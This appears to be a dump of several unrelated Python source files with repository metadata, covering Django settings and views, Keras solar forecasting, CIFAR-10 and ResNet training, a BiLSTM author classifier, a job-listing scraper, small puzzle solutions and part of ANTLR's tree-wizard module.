SECRET_KEY = 'django-insecure-nexhg*7y2rx&(br1g!+(4wna5_^o(&%hshbrft15xv$mvxin8&'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'myapp',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'myproject_3.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'myproject_3.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"dheerajgadhamsetty"
] | dheerajgadhamsetty |
e2305a194758b56976ba2b3d942a874de4f50a80 | bfe13b5458c5a3b8a212479ad8596934738a83d9 | /solar/solar_conv1d_1.py | b6c23eee1267e5d4790dbb3a0f5d9eff7cae0ab1 | [] | no_license | sswwd95/Project | f32968b6a640dffcfba53df943f0cf48e60d29df | fdcf8556b6203a407e5548cb4eda195fb597ad6e | refs/heads/master | 2023-04-21T23:03:24.282518 | 2021-02-15T00:55:16 | 2021-02-15T00:55:16 | 338,989,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,872 | py | import pandas as pd
import numpy as np
import os
import glob
import random
import tensorflow.keras.backend as K
import warnings
warnings.filterwarnings('ignore')
train = pd.read_csv('./solar/csv/train.csv')
sub = pd.read_csv('./solar/csv/sample_submission.csv')
# Hour - 시간
# Minute - 분
# DHI - 수평면 산란일사량(Diffuse Horizontal Irradiance (W/m2))
# DNI - 직달일사량(Direct Normal Irradiance (W/m2))
# WS - 풍속(Wind Speed (m/s))
# RH - 상대습도(Relative Humidity (%))
# T - 기온(Temperature (Degree C))
# Target - 태양광 발전량 (kW)
# axis = 0은 행렬에서 행의 원소를 다 더함, 1은 열의 원소를 다 더함
# 1. 데이터
#DHI, DNI 보다 더 직관적인 GHI 열 추가.
def preprocess_data(data, is_train=True):
data['cos'] = np.cos(np.pi/2 - np.abs(data['Hour']%12-6)/6*np.pi/2)
data.insert(1, 'GHI', data['DNI']*data['cos']+data['DHI'])
temp = data.copy()
temp = temp[['Hour','TARGET','GHI','DHI', 'DNI', 'WS', 'RH', 'T']]
if is_train==True:
temp['Target1'] = temp['TARGET'].shift(-48).fillna(method='ffill') # day7
temp['Target2'] = temp['TARGET'].shift(-48*2).fillna(method='ffill') # day8
temp = temp.dropna()
return temp.iloc[:-96] # day8에서 2일치 땡겨서 올라갔기 때문에 마지막 2일 빼주기
elif is_train==False:
temp = temp[['Hour','TARGET','GHI','DHI', 'DNI', 'WS', 'RH', 'T']]
return temp.iloc[-48:,:] # 트레인데이터가 아니면 마지막 하루만 리턴시킴
df_train = preprocess_data(train)
x_train = df_train.to_numpy()
print(x_train)
print(x_train.shape) #(52464, 10) day7,8일 추가해서 컬럼 10개
###### test파일 합치기############
df_test = []
for i in range(81):
file_path = '../solar/test/' + str(i) + '.csv'
temp = pd.read_csv(file_path)
temp = preprocess_data(temp, is_train=False) # 위에서 명시한 False => 마지막 하루만 리턴
df_test.append(temp) # 마지막 하루 값들만 전부 붙여주기
x_test = pd.concat(df_test)
print(x_test.shape) #(3888, 8) -> (81, 48,8) 81일, 하루(24*2(30분단위)=48), 8개 컬럼
x_test = x_test.to_numpy()
##################################
# 정규화 (데이터가 0으로 많이 쏠려있어서 standardscaler 사용)
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
scaler.fit(x_train[:,:-2]) # day7,8일을 빼고 나머지 컬럼들을 train
x_train[:,:-2] = scaler.transform(x_train[:,:-2])
x_test = scaler.transform(x_test)
######## train데이터 분리 ###########
def split_xy(data,timestep):
x, y1, y2 = [],[],[]
for i in range(len(data)):
x_end = i + timestep
if x_end>len(data):
break
tmp_x = data[i:x_end,:-2] # x_train
tmp_y1 = data[x_end-1:x_end,-2] # day7 / x_end-1:x_end => i:x_end와 같은 위치로 맞춰주기
tmp_y2 = data[x_end-1:x_end,-1] # day8
x.append(tmp_x)
y1.append(tmp_y1)
y2.append(tmp_y2)
return(np.array(x), np.array(y1), np.array(y2))
x, y1, y2 = split_xy(x_train,1) # x_train을 한 행씩 자른다. (30분 단위로 보면서 day7,8의 같은 시간대 예측)
print(x.shape) #(52464, 1, 8)
print(y1.shape) #(52464, 1)
print(y2.shape) #(52464, 1)
########## test 데이터를 train 데이터와 같게 분리 ######
def split_x(data, timestep) :
x = []
for i in range(len(data)):
x_end = i + timestep
if x_end>len(data):
break
tmp_x = data[i:x_end]
x.append(tmp_x)
return(np.array(x))
x_test = split_x(x_test,1)
######################################################
from sklearn.model_selection import train_test_split
x_train, x_val, y1_train, y1_val, y2_train, y2_val = train_test_split(
x, y1, y2, train_size = 0.8, random_state=0)
print(x_train.shape) #(41971, 1, 8)
def quantile_loss(q, y_true, y_pred):
e = (y_true - y_pred) # 원래값에서 예측값 뺀 것
return K.mean(K.maximum(q*e, (q-1)*e), axis=-1)
quantiles = [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]
# 2. 모델구성
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Conv1D, Flatten, Dropout
def Model():
model = Sequential()
model.add(Conv1D(128,2,padding='same',activation='relu', input_shape = (1,8)))
model.add(Dropout(0.2))
model.add(Conv1D(64,2,padding='same', activation='relu'))
model.add(Conv1D(64,2,padding='same', activation='relu'))
model.add(Flatten())
model.add(Dense(64, activation='relu'))
model.add(Dense(32, activation='relu'))
model.add(Dense(16, activation='relu'))
model.add(Dense(1, activation='relu'))
return model
from tensorflow.keras.callbacks import EarlyStopping,ModelCheckpoint,ReduceLROnPlateau
modelpath = '../solar/check/solar0121_{epoch:02d}_{val_loss:.4f}.hdf5'
cp = ModelCheckpoint(filepath=modelpath, monitor='val_loss', save_best_only=True, mode='auto')
es = EarlyStopping(monitor = 'val_loss', patience=10, mode='min')
lr = ReduceLROnPlateau(monitor='val_loss', patience=5, factor=0.5)
bs = 16
epochs = 1
######day7######
x=[]
for q in quantiles:
model = Model()
modelpath = '../solar/check/solar_0121_day7_{epoch:02d}_{val_loss:.4f}.hdf5'
cp = ModelCheckpoint(filepath=modelpath, monitor='val_loss', save_best_only=True, mode='auto')
model.compile(loss=lambda y_true,y_pred: quantile_loss(q,y_true, y_pred),
optimizer='adam', metrics = [lambda y, y_pred: quantile_loss(q, y, y_pred)])
model.fit(x_train,y1_train, batch_size = bs, callbacks=[es, cp, lr], epochs=epochs, validation_data=(x_val, y1_val))
pred = pd.DataFrame(model.predict(x_test).round(2)) # round는 반올림 (2)는 . 뒤의 자리수 -> ex) 0.xx를 반올림
x.append(pred)
df_temp1 = pd.concat(x, axis=1)
df_temp1[df_temp1<0] = 0 # 0보다 작으면 0로 한다.
num_temp1 = df_temp1.to_numpy()
sub.loc[sub.id.str.contains('Day7'), 'q_0.1':] = num_temp1
######day8#######
x = []
for q in quantiles:
model = Model()
modelpath = '../solar/check/solar_0121_day8_{epoch:02d}_{val_loss:.4f}.hdf5'
cp = ModelCheckpoint(filepath=modelpath, monitor='val_loss', save_best_only=True, mode='auto')
model.compile(loss=lambda y_true,y_pred: quantile_loss(q,y_true, y_pred),
optimizer='adam', metrics = [lambda y, y_pred: quantile_loss(q, y, y_pred)])
model.fit(x_train,y2_train, batch_size = bs, callbacks=[es, cp, lr], epochs=epochs, validation_data=(x_val, y2_val))
pred = pd.DataFrame(model.predict(x_test).round(2)) # round는 반올림 (2)는 . 뒤의 자리수 -> ex) 0.xx를 반올림
x.append(pred)
df_temp2 = pd.concat(x, axis=1)
df_temp2[df_temp2<0] = 0
num_temp2 = df_temp2.to_numpy()
sub.loc[sub.id.str.contains('Day8'), 'q_0.1':] = num_temp2
sub.to_csv('./solar/csv/sub_0121.csv', index=False)
| [
"sswwd95@gmail.com"
] | sswwd95@gmail.com |
410b397dc6a489aa072140828831f2d5c2b5bc1d | b70964419f820d7b5979e11c6b1dcc3ad6e2f32b | /my-projects/how-to-web-scrap/beautifulsoup-tutorial.py | d217108d769d10b59393bf32cf0eafc89c5c847e | [] | no_license | pedrogaldiano/learning-python | d381c8d149766e29579270945956f33aa28a867a | b036de991a926c021a97e60b6b8bba063b3e04b9 | refs/heads/master | 2023-06-05T15:24:07.670598 | 2021-06-12T00:37:55 | 2021-06-12T00:37:55 | 351,215,403 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,201 | py | from bs4 import BeautifulSoup
import requests
url = 'https://www.timesjobs.com/candidate/job-search.html?searchType=personalizedSearch&from=submit&txtKeywords=python&txtLocation='
html_text = requests.get(url).text
soup = BeautifulSoup(html_text, 'lxml')
jobs = soup.find_all('li', class_="clearfix job-bx wht-shd-bx")
for job in jobs:
# job = soup.find('li', class_="clearfix job-bx wht-shd-bx")
# job_title = job.find('strong', class_="blkclor").text.strip()
job_company = job.find('h3', class_="joblist-comp-name").text.strip()
job_exp = job.ul.li.text.strip()
job_loc = job.ul.span.text.strip()
job_info = job.find('ul', class_="list-job-dtl clearfix")
job_skills = job_info.span.text.strip().replace(' ', '').replace(',', ', ')
# job_desc = job_info.li.text.strip()
# index_job_desc1 = job_desc.index(':') + 3
# index_job_desc2 = job_desc.index('...') + 3
# job_posted = job.find('span', class_="sim-posted").text.strip()
job_more = job.find('a')['href']
print(f'''
Skills: {job_skills}
Experience: {job_exp[11:]}
Location: {job_loc}
Company: {job_company}
Link : {job_more}''')
| [
"noreply@github.com"
] | noreply@github.com |
237ed5f539d9574b418d151c89a4c1c84834526c | 3adec884f06eabfe50d4ab3456123e04d02b02ff | /287. Find the Duplicate Number.py | df0582aa45ceb74b6bdc850e22299524e03b7121 | [] | no_license | windmzx/pyleetcode | c57ecb855c8e560dd32cf7cf14616be2f91ba50e | d0a1cb895e1604fcf70a73ea1c4b1e6b283e3400 | refs/heads/master | 2022-10-05T17:51:08.394112 | 2020-06-09T09:24:28 | 2020-06-09T09:24:28 | 250,222,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 527 | py | from typing import List
class Solution:
def findDuplicate(self, nums: List[int]) -> int:
left = 1
right = len(nums)
while left < right:
mid = (left+right)//2
count = 0
for i in nums:
if i <= mid:
count += 1
if count>mid:
right=mid
else:
left=mid+1
return left
if __name__ == "__main__":
x=Solution()
print(x.findDuplicate([1,3,3,2]))
| [
"2281927774@qq.com"
] | 2281927774@qq.com |
34017423ccd92177b7ccc9ac8445d31505fcfc05 | 20aadf6ec9fd64d1d6dffff56b05853e0ab26b1f | /problemset3/hangmanPart1.py | 98e635434a0aee5915adad9d46256d25316d340e | [] | no_license | feminas-k/MITx---6.00.1x | 9a8e81630be784e5aaa890d811674962c66d56eb | 1ddf24c25220f8b5f78d36e2a3342b6babb40669 | refs/heads/master | 2021-01-19T00:59:57.434511 | 2016-06-13T18:13:17 | 2016-06-13T18:13:17 | 61,058,244 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | def isWordGuessed(secretWord, lettersGuessed):
'''
secretWord: string, the word the user is guessing
lettersGuessed: list, what letters have been guessed so far
returns: boolean, True if all the letters of secretWord are in lettersGuessed;
False otherwise
'''
# FILL IN YOUR CODE HERE...
for i in secretWord:
if i not in lettersGuessed:
return False
return True
| [
"femi1991@gmail.com"
] | femi1991@gmail.com |
3565db12c8b480aa89ccde8a920b235468f5b8bd | a76401f82ed1c9ac47ddaff27681b90f37627426 | /.history/student_olx/main/views_20210918220710.py | 00898ea1a70e8e5709999b326bcaf4ccf228a65b | [] | no_license | RiteshK555/itw-project | e90e1dd13517ee8b07d72cc3bd5a42af367ab587 | a2e4c8682c2030ff77da9ade5ae4677bd475f87a | refs/heads/master | 2023-08-30T03:48:58.904979 | 2021-11-10T09:50:59 | 2021-11-10T09:50:59 | 410,032,076 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 966 | py | from django.http.response import HttpResponseRedirect
from django.shortcuts import render,redirect
from .models import ToDoList
# Create your views here.
from django.http import HttpResponse
from .forms import CreateNewProduct
def index(response,id):
lis=ToDoList.objects.get(id=id)
return render(response,"main/base.html",{"name":lis})
def home(response):
return render(response,"main/home.html",{"name":"test"})
def sell(response):
if response.method == "POST":
form=CreateNewProduct(response.POST)
if form.is_valid():
p_n=form.cleaned_data["product_name"]
d=form.cleaned_data["description"]
m=ToDoList(product_name=p_n,description=d)
d.save()
m.save()
return HttpResponseRedirect("/%i" %m.id)
else:
form=CreateNewProduct()
return render(response,"main/sell.html",{"form":form})
def buy(response):
return render(response,"main/buy.html",{})
| [
""
] | |
b208b1c05aecfb3ed8bf1b22d72edc9eea8eac98 | cde798e18c5b134d5ca8beab102573e4b2e9a33b | /CIFAR/cifar10_data.py | ae150dac9e72e2411f42160f175a0f5f706940ec | [] | no_license | trifisch/ml-experiments | b9a6e3c96cf7a40fe541ce485ec6812c3424ab8f | 4e6ab63df2b69da027b9ea3eac4212364863162f | refs/heads/master | 2022-11-06T05:16:58.174506 | 2020-06-16T14:02:12 | 2020-06-16T14:02:12 | 267,070,945 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,628 | py | import numpy as np
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
from tensorflow.keras.datasets import cifar10
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.preprocessing.image import ImageDataGenerator
# configurable parameters
val_ratio = 0.3 # percentage of validation set values
random_state = 0 # for reproducible splits
rotation_range=10
zoom_range=0.05
width_shift_range=0.05
height_shift_range=0.05
fill_mode='constant'
cval=0.0
horizontal_flip=False
vertical_flip=False
class CIFAR10:
def __init__(self, scale_mode="none", augment_size=0):
# Load the data set
(self.x_train, self.y_train), (self.x_test, self.y_test) = cifar10.load_data()
# Convert to float32
self.x_train = self.x_train.astype(np.float32)
self.y_train = self.y_train.astype(np.float32)
self.x_test = self.x_test.astype(np.float32)
self.y_test = self.y_test.astype(np.float32)
# split validation set from training set
self.x_train, self.x_val, self.y_train, self.y_val = train_test_split(self.x_train, self.y_train, test_size=val_ratio, random_state=random_state)
# Save important data attributes as variables
self.train_size = self.x_train.shape[0]
self.val_size = self.x_val.shape[0]
self.test_size = self.x_test.shape[0]
# image dimensions
self.width = self.x_train.shape[1]
self.height = self.x_train.shape[2]
self.depth = self.x_train.shape[3]
self.num_features = self.width * self.height * self.depth
self.num_classes = 10 # Constant for the data set
# Reshape the y data to one hot encoding
self.y_train = to_categorical(self.y_train, num_classes=self.num_classes)
self.y_val = to_categorical(self.y_val, num_classes=self.num_classes)
self.y_test = to_categorical(self.y_test, num_classes=self.num_classes)
# augment train data
self.augment_data(augment_size=augment_size)
# scale train, val and test data
self.scale_data(scale_mode=scale_mode)
def augment_data(self, augment_size=0):
if augment_size==0:
return
# Create an instance of the image data generator class
image_generator = ImageDataGenerator(
rotation_range=rotation_range,
zoom_range=zoom_range,
width_shift_range=width_shift_range,
height_shift_range=height_shift_range,
fill_mode=fill_mode,
horizontal_flip=horizontal_flip,
vertical_flip=vertical_flip,
cval=cval)
# Fit the data generator
image_generator.fit(self.x_train, augment=True)
# Get random train images for the data augmentation
rand_idxs = np.random.randint(self.train_size, size=augment_size)
x_augmented = self.x_train[rand_idxs].copy()
y_augmented = self.y_train[rand_idxs].copy()
x_augmented = image_generator.flow(x_augmented, batch_size=augment_size, shuffle=False).next()#[0]
# Append the augmented images to the train set
self.x_train = np.concatenate((self.x_train, x_augmented))
self.y_train = np.concatenate((self.y_train, y_augmented))
self.train_size = self.x_train.shape[0]
def scale_data(self, scale_mode="none", preprocess_params=None):
# Preprocess the data
if scale_mode == "standard":
if preprocess_params:
self.scaler = StandardScaler(**preprocess_params)
else:
self.scaler = StandardScaler()
elif scale_mode == "minmax":
if preprocess_params:
self.scaler = MinMaxScaler(**preprocess_params)
else:
self.scaler = MinMaxScaler(feature_range=(0, 1))
else:
return
# Temporary flatteining of the x data
self.x_train = self.x_train.reshape(self.train_size, self.num_features)
self.x_val = self.x_val.reshape(self.val_size, self.num_features)
self.x_test = self.x_test.reshape(self.test_size, self.num_features)
# Fitting and transforming
self.scaler.fit(self.x_train)
self.x_train = self.scaler.transform(self.x_train)
self.x_val = self.scaler.transform(self.x_val)
self.x_test = self.scaler.transform(self.x_test)
# Reshaping the xdata back to the input shape
self.x_train = self.x_train.reshape(
(self.train_size, self.width, self.height, self.depth))
self.x_val = self.x_val.reshape(
(self.val_size, self.width, self.height, self.depth))
self.x_test = self.x_test.reshape(
(self.test_size, self.width, self.height, self.depth))
# just for general check: show random pics from train, val, and test set
if __name__ == "__main__":
import matplotlib.pyplot as plt
cifar = CIFAR10(scale_mode="minmax")
train_img = cifar.x_train[np.random.randint(0, cifar.x_train.shape[0])]
val_img = cifar.x_train[np.random.randint(0, cifar.x_val.shape[0])]
test_img = cifar.x_train[np.random.randint(0, cifar.x_test.shape[0])]
fig, axes = plt.subplots(1, 3)
plt.tight_layout()
scale = 1.0 # use 255.0 if not already scaled upfront, e.g. with minmax scaler
axes[0].imshow(train_img/scale)
axes[0].set_title("Train")
axes[1].imshow(val_img/scale)
axes[1].set_title("Val")
axes[2].imshow(test_img/scale)
axes[2].set_title("Test")
plt.show()
| [
"trifisch@gmail.com"
] | trifisch@gmail.com |
3936f486d98614476a1c024263c2f459ed44e998 | 16260b9e32245ab00f15911a610fa5de50830310 | /bilstm.py | c51bf074a961fbae1b659850d4f6c46b60f6fcba | [] | no_license | lorenzoscottb/semantic_author_profiling | 3c42a6f4ec5564d707e56183b8dcbe3abca8de00 | 5182a234aa0f1c7a42713a7a16e34da9a295566a | refs/heads/master | 2020-03-19T03:10:41.299438 | 2019-01-23T11:22:59 | 2019-01-23T11:22:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,647 | py |
import random
import logging
from numpy import array
from numpy import cumsum
from keras.models import Sequential
from keras.layers import LSTM
from keras.layers import Dense
from keras.layers import Bidirectional
from keras.utils.np_utils import to_categorical
from sklearn.preprocessing import StandardScaler
from pandas_ml import ConfusionMatrix
import matplotlib.pyplot as plt
# The BiLSTM
def Bi_LSTM(units, features, time_steps, prn=False):
model = Sequential()
model.add(Bidirectional(LSTM(units, return_sequences=False),
input_shape=(time_steps, features),
merge_mode='concat'))
model.add(Dense(int((units/2)), activation='relu'))
model.add(Dense(43, activation='softmax'))
model.compile(loss='sparse_categorical_crossentropy',
optimizer='adam', metrics=['acc'])
if prn:
print(model.summary())
return model
# Training
# setting the task ; 3D modelling : sample, time steps, and feature.
model = Bi_LSTM(512, 400, None, prn=True)
# train model on given % of stimuli
# indicate the newtwork corpus:
# touples of shape (expected output(integer), sentence(series of vectors))
ts = int((len(network_corpus)*65)/100)
for i in range(ts):
print('interation '+str(i)+'of'+' '+str(ts))
x = [vec for vec in network_corpus[i][1]]
y = network_corpus[i][0]
# extracting each sample (sentence) lenth
length = len(x)
# reshape: sample, time steps, feature at each time step.
# if I have 1000 sentences of 10 words, presented in a 3-dim vector:
# is nb_samples = 1000, time steps = 10, input_dim = 3
X = array(x).reshape(1, length, 400)
Y = array(y).reshape(1, 1)
model.fit(X, Y, epochs=10, batch_size=33, verbose=2)
# Evaluation
start = len(network_corpus)-ts
tt = 25
out = list(np.zeros(tt))
exp = list(np.zeros(tt))
correct = 0
for i in range(tt):
x = [vec for vec in network_corpus[i+start][1]]
y = network_corpus[i+start][0]
length = len(x)
X = array(x).reshape(1, length, 400)
Y = array(y).reshape(1, 1)
out[i] = model.predict_classes(X, verbose=2)
exp[i] = y
if y == out[i]:
correct += 1
print('predicted Class: '+str(out[i])+' Actual Class: '+
str(y))
print('Overall accuracy: '+str(int((correct*100)/tt))+'%')
# plotting the confusion matrix
# reconverting numbers to presidnts names
predicted = [list(d.keys())[int(p)] for p in nltk.word_tokenize(str(out)) if p.isdigit()]
actual = [list(d.keys())[a] for a in exp]
cf = ConfusionMatrix(actual, predicted)
cf.plot(normalized=True, backend='seaborn', cmap="Blues")
plt.show()
| [
"noreply@github.com"
] | noreply@github.com |
8e6659d0c00a5650bd1681c6f669fe5fc6f3a1b4 | 2891a904792376e20c3b481a556c3823a2a09625 | /src/spatial_stream.py | 4ae598257218b9e77f91486a19789e8f23196784 | [
"MIT"
] | permissive | ganler/2StreamConvNet-for-single-channel-series | 46dac979a2b5853804f2dd3415995c0ac0a61899 | c58c248c3a259cee4a4c14575bc95b643e56a6c6 | refs/heads/master | 2021-07-03T06:31:19.186924 | 2020-09-19T08:35:01 | 2020-09-19T08:35:01 | 171,025,708 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,435 | py | import torchvision.models as models
from torchvision import transforms
import torch
import numpy as np
from torch import nn
from src.spatial_and_motion_dataloader import * # self-made
if __name__ == "__main__":
key_word = 'spatial'
# DEVICE
# ########## !!! LOOK HERE !!! ############ #
use_gpu = 0
# ######################################### #
device = torch.device('cuda' if torch.cuda.is_available() and use_gpu else 'cpu')
# PARAMETERS
num_epoachs = 1
batch_size = 5
times4print = 100 / batch_size # time for print (I print the info for every * batches)
num_classes = 17
classes = np.arange(num_classes)
learning_rate = 0.01
train_dataset = sm_dataset('train.csv', key_word, transforms.Compose([transforms.Resize((224, 224)), transforms.ToTensor()]))
valid_dataset = sm_dataset('valid.csv', key_word, transforms.Compose([transforms.Resize((224, 224)), transforms.ToTensor()]))
# LOADER
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
batch_size=1,
num_workers=2,
shuffle=False)
valid_loader = torch.utils.data.DataLoader(dataset=valid_dataset,
num_workers=2,
shuffle=False)
# ===========CHOOSE THE MODELS===========
# MODEL, LOSS FUNC AND OPTIMISER
# resnet
# model = models.ResNet(pretrained=True)
model = models.resnet18(pretrained=True)
# model = models.resnet34(pretrained=True)
# model = models.resnet50(pretrained=True)
# vgg
# model = models.VGG(pretrained=True)
# model = models.vgg11(pretrained=True)
# model = models.vgg16(pretrained=True)
# model = models.vgg16_bn(pretrained=True)
pre_model = model
model.fc = nn.Linear(model.fc.in_features, num_classes)
pretrained_dict = pre_model.state_dict()
model_dict = model.state_dict()
# 将pretrained_dict里不属于model_dict的键剔除掉
pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}
model_dict.update(pretrained_dict)
# TRAIN MODE 1 ================================
model.load_state_dict(model_dict)
# 至此fine-tune对应的结构已经搞定
# 除了最后两层,其余都把梯度给冻结
for para in list(model.parameters())[:-2]:
para.requires_grad = False
# 只训练最后2层
optimizer = torch.optim.Adamax(params=[model.fc.weight, model.fc.bias], lr=learning_rate, weight_decay=1e-4)
# -------------================================
#
# # TRAIN MODE 2 ================================
# ignored_params = list(map(id, model.parameters()[:-2]))
# # fc3是net中的一个数据成员
# base_params = filter(
# lambda p: id(p) not in ignored_params,
# model.parameters()
# )
# '''
# id(x)返回的是x的内存地址。上面的意思是,对于在net.parameters()中的p,过滤掉'id(p) not in ignored_params'中的p。
# '''
#
# optimizer = torch.optim.Adamax(
# [{'params': base_params},
# {'params': model.fc3.parameters(), 'lr': learning_rate}],
# 1e-3, weight_decay=1e-4
# )
# # -------------================================
if torch.cuda.is_available() and use_gpu:
model = model.cuda()
loss_func = nn.CrossEntropyLoss()
# TRAIN
total_steps = len(train_loader)
for epoach in range(num_epoachs):
loss_accumulation = 0
for i, (imgs, labels) in enumerate(train_loader):
imgs = imgs.to(device)
labels = labels.to(device)
out = model(imgs)
loss = loss_func(out, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss_accumulation += loss.item()
if (i + 1) % times4print == 0:
print(f"[{epoach+1}/{num_epoachs}]: -> [{i+1}/{total_steps}] -> loss: {loss_accumulation/times4print}")
loss_accumulation = 0
# TEST
model.eval()
label_cp = np.zeros(len(valid_loader))
np_out = np.zeros((len(valid_loader), num_classes))
with torch.no_grad():
class_correct = list(0. for i in range(num_classes))
class_total = class_correct.copy()
for k, (imgs, labels) in enumerate(valid_loader):
label_cp[k] = labels.numpy()
imgs = imgs.to(device)
labels = labels.to(device)
out = model(imgs)
np_out[k] = out.numpy()
_, predicted = torch.max(out, 1)
ans_batch = (predicted == labels).squeeze()
for k, label in enumerate(labels):
if ans_batch.item() == 1: # right
class_correct[label] += 1
class_total[label] += 1
if sum(class_total) != 0:
print(f">>> FINAL ACCURACY: {100 * sum(class_correct)/sum(class_total)}% -> {class_correct}/{class_total}")
for i in range(num_classes):
if class_total[i] != 0:
print(f">>> [{classes[i]}] : {100 * class_correct[i]/class_total[i]}% -> {class_correct[i]}/{class_total[i]}")
np.savetxt(key_word+'_out.txt', np_out)
np.savetxt('label_out.txt', label_cp)
torch.save(model.state_dict(), key_word+'_stream_model.ckpt') | [
"noreply@github.com"
] | noreply@github.com |
f0ca2ca8e3d495e1b3a28c35d67234789796811b | 32c56293475f49c6dd1b0f1334756b5ad8763da9 | /google-cloud-sdk/lib/third_party/antlr3/treewizard.py | f598edde386f82916f466737236f3becde4458a3 | [
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | bopopescu/socialliteapp | b9041f17f8724ee86f2ecc6e2e45b8ff6a44b494 | 85bb264e273568b5a0408f733b403c56373e2508 | refs/heads/master | 2022-11-20T03:01:47.654498 | 2020-02-01T20:29:43 | 2020-02-01T20:29:43 | 282,403,750 | 0 | 0 | MIT | 2020-07-25T08:31:59 | 2020-07-25T08:31:59 | null | UTF-8 | Python | false | false | 16,576 | py | # Lint as: python2, python3
""" @package antlr3.tree
@brief ANTLR3 runtime package, treewizard module
A utility module to create ASTs at runtime.
See <http://www.antlr.org/wiki/display/~admin/2007/07/02/Exploring+Concept+of+TreeWizard> for an overview. Note that the API of the Python implementation is slightly different.
"""
# begin[licence]
#
# [The "BSD licence"]
# Copyright (c) 2005-2008 Terence Parr
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. The name of the author may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# end[licence]
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from antlr3.constants import INVALID_TOKEN_TYPE
from antlr3.tokens import CommonToken
from antlr3.tree import CommonTree, CommonTreeAdaptor
import six
from six.moves import range
def computeTokenTypes(tokenNames):
"""
Compute a dict that is an inverted index of
tokenNames (which maps int token types to names).
"""
if tokenNames is None:
return {}
return dict((name, type) for type, name in enumerate(tokenNames))
## token types for pattern parser
EOF = -1
BEGIN = 1
END = 2
ID = 3
ARG = 4
PERCENT = 5
COLON = 6
DOT = 7
class TreePatternLexer(object):
def __init__(self, pattern):
## The tree pattern to lex like "(A B C)"
self.pattern = pattern
## Index into input string
self.p = -1
## Current char
self.c = None
## How long is the pattern in char?
self.n = len(pattern)
## Set when token type is ID or ARG
self.sval = None
self.error = False
self.consume()
__idStartChar = frozenset(
'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_')
